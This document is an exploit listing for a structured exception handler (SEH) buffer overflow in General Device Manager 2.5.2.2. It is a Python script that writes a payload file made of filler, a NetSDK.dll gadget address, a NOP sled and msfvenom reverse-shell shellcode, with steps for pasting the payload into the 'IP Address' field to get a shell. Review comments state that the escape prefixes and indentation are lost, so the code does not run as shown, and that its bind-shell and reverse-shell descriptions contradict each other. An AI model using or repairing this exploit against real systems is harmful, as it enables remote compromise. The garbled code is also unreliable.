Authored by Ahmet Umit Bayram

General Device Manager version 2.5.2.2 suffers from a buffer overflow vulnerability.

# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ümit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit

# 1.- Run python code : exploit.py
# 2.- Open pwned.txt and copy all content to clipboard
# 3.- Open Device Manager and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address'
# 5.- Click 'OK'
# 6.- nc.exe local IP Port 1337 and you will have a bind shell
# 7.- R.I.P. Condor <3

import struct

# Payload layout, as described by the author: filler up to the SEH record,
# the next-SEH slot, the handler address, a NOP sled, then the shellcode.
#
# NOTE(review): as reproduced on this page, the "x.." sequences inside the
# byte literals below carry no escape prefix, so each literal evaluates to
# plain ASCII characters rather than the byte values the comments describe
# (e.g. b"xEBx06x90x90" is 12 printable characters). The listing therefore
# does not build the payload it documents; what is useful here is the
# overflow pattern itself (an unbounded copy from the 'IP Address' field into
# a stack buffer that overwrites the SEH chain), which is what a vendor fix
# or a detection rule should target.
offset = b"A" * 1308  # filler preceding the SEH record (length per the author)

nseh = b"xEBx06x90x90" # jmp short
# ^ intended as a short forward jump over the handler slot (author's comment)

# Handler address inside NetSDK.dll. The author's annotation reports the module
# is loaded without ASLR, rebasing or SafeSEH; that missing mitigation on a
# bundled DLL is the actionable finding for the vendor, independent of the
# specific gadget chosen.
seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:Program Files (x86)DeviceManageNetSDK.dll)


nops = b"x90" * 32  # NOP sled between the handler and the shellcode (see note above on the literal)

#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "x00x0ax0d" -f python --var-name shellcode
# NOTE(review): the msfvenom line above describes a reverse TCP shell to
# 127.0.0.1:1337, while step 6 of the header describes a bind shell; the two
# descriptions disagree — confirm which one the author actually tested.

shellcode = b""
shellcode += b"xd9xc6xbbxaexc7xedx8exd9x74x24xf4"
shellcode += b"x5ax29xc9xb1x52x83xeaxfcx31x5ax13"
shellcode += b"x03xf4xd4x0fx7bxf4x33x4dx84x04xc4"
shellcode += b"x32x0cxe1xf5x72x6ax62xa5x42xf8x26"
shellcode += b"x4ax28xacxd2xd9x5cx79xd5x6axeax5f"
shellcode += b"xd8x6bx47xa3x7bxe8x9axf0x5bxd1x54"
shellcode += b"x05x9ax16x88xe4xcexcfxc6x5bxfex64"
shellcode += b"x92x67x75x36x32xe0x6ax8fx35xc1x3d"
shellcode += b"x9bx6fxc1xbcx48x04x48xa6x8dx21x02"
shellcode += b"x5dx65xddx95xb7xb7x1ex39xf6x77xed"
shellcode += b"x43x3fxbfx0ex36x49xc3xb3x41x8exb9"
shellcode += b"x6fxc7x14x19xfbx7fxf0x9bx28x19x73"
shellcode += b"x97x85x6dxdbxb4x18xa1x50xc0x91x44"
shellcode += b"xb6x40xe1x62x12x08xb1x0bx03xf4x14"
shellcode += b"x33x53x57xc8x91x18x7ax1dxa8x43x13"
shellcode += b"xd2x81x7bxe3x7cx91x08xd1x23x09x86"
shellcode += b"x59xabx97x51x9dx86x60xcdx60x29x91"
shellcode += b"xc4xa6x7dxc1x7ex0exfex8ax7exafx2b"
shellcode += b"x1cx2ex1fx84xddx9exdfx74xb6xf4xef"
shellcode += b"xabxa6xf7x25xc4x4dx02xaex94x91x0c"
shellcode += b"x2fx03x90x0cx2axeax1dxeax5ex1cx48"
shellcode += b"xa5xf6x85xd1x3dx66x49xccx38xa8xc1"
shellcode += b"xe3xbdx67x22x89xadx10xc2xc4x8fxb7"
shellcode += b"xddxf2xa7x54x4fx99x37x12x6cx36x60"
shellcode += b"x73x42x4fxe4x69xfdxf9x1ax70x9bxc2"
shellcode += b"x9exafx58xccx1fx3dxe4xeax0fxfbxe5"
shellcode += b"xb6x7bx53xb0x60xd5x15x6axc3x8fxcf"
shellcode += b"xc1x8dx47x89x29x0ex11x96x67xf8xfd"
shellcode += b"x27xdexbdx02x87xb6x49x7bxf5x26xb5"
shellcode += b"x56xbdx47x54x72xc8xefxc1x17x71x72"
shellcode += b"xf2xc2xb6x8bx71xe6x46x68x69x83x43"
shellcode += b"x34x2dx78x3ex25xd8x7exedx46xc9"


# Concatenation order matches the stack layout the author describes:
# filler, next-SEH, handler address, sled, shellcode.
final_payload = offset + nseh + seh + nops + shellcode

# write the final payload to a file
# NOTE(review): as reproduced here, the bodies of the try/with blocks below
# have lost their indentation, so the file does not parse as shown.
# NOTE(review): the explicit f.close() is redundant — the with-statement
# already closes the file on exit — and the bare `except:` swallows every
# error (including KeyboardInterrupt) without reporting the cause; catching
# OSError and printing the exception would make a failed write diagnosable.
try:
with open('pwned.txt', 'wb') as f:
print("[+] Creating %s bytes evil payload..." %len(final_payload))
f.write(final_payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created!")